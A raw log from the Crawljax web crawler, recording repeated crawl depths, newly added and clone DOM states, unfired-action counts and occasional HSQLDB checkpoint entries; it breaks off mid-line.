3446730 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3447890 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3449226 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3450787 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state548 added to the StateMachine. 3450787 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3450796 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3453078 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3454232 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3455520 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3457186 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state549 added to the StateMachine. 3457186 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3457199 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3459472 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3460629 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3461962 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3463514 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state550 added to the StateMachine. 3463514 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3463524 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3465851 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3467006 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3468340 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3469868 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state551 and state14 are the same. 3469872 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3472175 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3473331 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3474625 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3476302 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state552 added to the StateMachine. 3476302 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3476316 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3478620 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3479776 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3481095 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3482650 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state553 and state14 are the same. 3482654 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3484933 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3486089 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3487391 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3489092 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state554 added to the StateMachine. 3489092 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3489103 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3491430 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3492616 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3493921 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3495593 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state555 and state14 are the same. 3495600 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3497901 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3499057 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3500350 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3501897 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state556 added to the StateMachine. 3501897 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3501907 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3504209 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3505382 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3506691 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3508365 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state557 and state14 are the same. 3508369 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3509070 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 3509070 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 3509076 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 3509393 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 3509396 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 3510663 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3511825 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3513147 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3514820 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state558 added to the StateMachine. 3514820 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3514834 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3517148 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3518322 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3519635 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3521229 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state559 and state14 are the same. 3521233 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3523499 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3524660 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3525959 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3527506 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state560 added to the StateMachine. 3527506 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3527516 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3529803 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3530960 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3532255 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3533929 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state561 and state487 are the same. 3533933 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3536239 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3537405 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3538722 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3540243 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state562 added to the StateMachine. 3540243 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3540253 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3542551 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3543713 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3545002 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3546730 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state563 and state487 are the same. 3546734 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3549036 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3550196 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3551683 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3553227 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state564 added to the StateMachine. 3553227 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3553241 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3555534 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3556695 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3557996 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3559532 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state565 and state516 are the same. 3559535 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3561829 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3562986 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3564303 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3565840 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state566 added to the StateMachine. 3565840 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3565850 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3568138 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3569294 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3570589 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3572268 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state567 and state14 are the same. 3572272 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3574603 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3575782 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3577100 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3578640 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state568 added to the StateMachine. 3578640 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3578650 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3580931 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3582088 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3583381 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3584903 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state569 and state14 are the same. 3584906 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3587184 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3588346 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3589677 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3591387 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state570 added to the StateMachine. 3591387 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3591398 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3593681 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3594843 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3596140 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3597799 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state571 and state14 are the same. 3597804 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3600104 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3601268 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3602587 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3604115 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state572 added to the StateMachine. 3604116 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3604125 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3606408 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3607564 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3608859 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3610582 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state573 and state14 are the same. 3610586 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3612880 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3614043 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3615336 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3616995 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state574 added to the StateMachine. 3616995 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3617010 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3619299 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3620460 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3621787 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3623333 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state575 and state14 are the same. 3623336 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3625614 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3626777 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3628076 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3629743 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state576 added to the StateMachine. 3629744 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3629758 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3632042 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3633203 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3634534 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3636262 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state577 and state516 are the same. 3636266 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3638567 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3639725 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3641016 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3642544 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state578 added to the StateMachine. 3642544 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3642554 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3644859 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3646019 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3647469 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3649000 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state579 and state516 are the same. 3649004 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3651315 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3652475 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3653770 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3655325 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state580 added to the StateMachine. 3655325 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3655334 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3657617 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3658781 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3660084 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3661769 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state581 added to the StateMachine. 3661770 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3661782 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3664083 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3665247 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3666580 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3668123 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state582 added to the StateMachine. 3668123 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3668133 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3670421 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3671582 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3672878 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3674544 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state583 and state14 are the same. 3674548 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3676859 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3678018 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3679340 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3680862 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state584 added to the StateMachine. 3680862 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3680871 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3683159 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3684319 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3685613 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3687295 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state585 and state14 are the same. 3687299 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3689591 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3690753 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3692079 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3693790 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state586 added to the StateMachine. 3693790 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3693804 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3696099 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3697265 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3698579 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3700113 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state587 and state14 are the same. 3700117 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3702401 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3703562 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3704862 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3706526 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state588 added to the StateMachine. 3706526 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3706540 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3708214 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 3708214 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 3708219 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 3708547 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 3708549 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 3708842 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3710004 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3711319 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3712854 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state589 and state14 are the same. 3712858 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3715168 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3716329 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3717633 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3719162 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state590 added to the StateMachine. 3719162 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3719171 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3721454 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3722615 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3723914 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3725632 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state591 and state14 are the same. 3725636 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3727946 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3729108 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3730418 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3731983 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state592 added to the StateMachine. 3731983 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3731992 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3734281 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3735442 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3736740 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3738268 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state593 and state487 are the same. 3738272 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3740549 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3741716 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3743019 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3744695 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state594 added to the StateMachine. 3744696 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3744710 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3746999 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3748160 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3749490 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3751029 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state595 and state487 are the same. 3751033 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3753339 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3754518 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3755837 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3757536 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state596 added to the StateMachine. 3757537 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3757551 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3759873 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3761047 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3762376 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3763925 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state597 and state516 are the same. 3763928 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3766197 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3767359 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3768681 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3770216 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state598 added to the StateMachine. 3770216 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3770226 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3772536 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3773698 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3774990 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3776578 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state599 and state14 are the same. 3776583 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3778883 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3780058 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3781365 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3783069 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state600 added to the StateMachine. 3783069 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3783083 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3785411 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3786581 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3787880 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3789632 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state601 and state14 are the same. 3789639 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3791955 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3793124 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3794446 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3795973 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state602 added to the StateMachine. 3795974 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3795983 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 2 states with unfired actions 3798252 [pool-2-thread-2] INFO com.crawljax.core.Crawler - 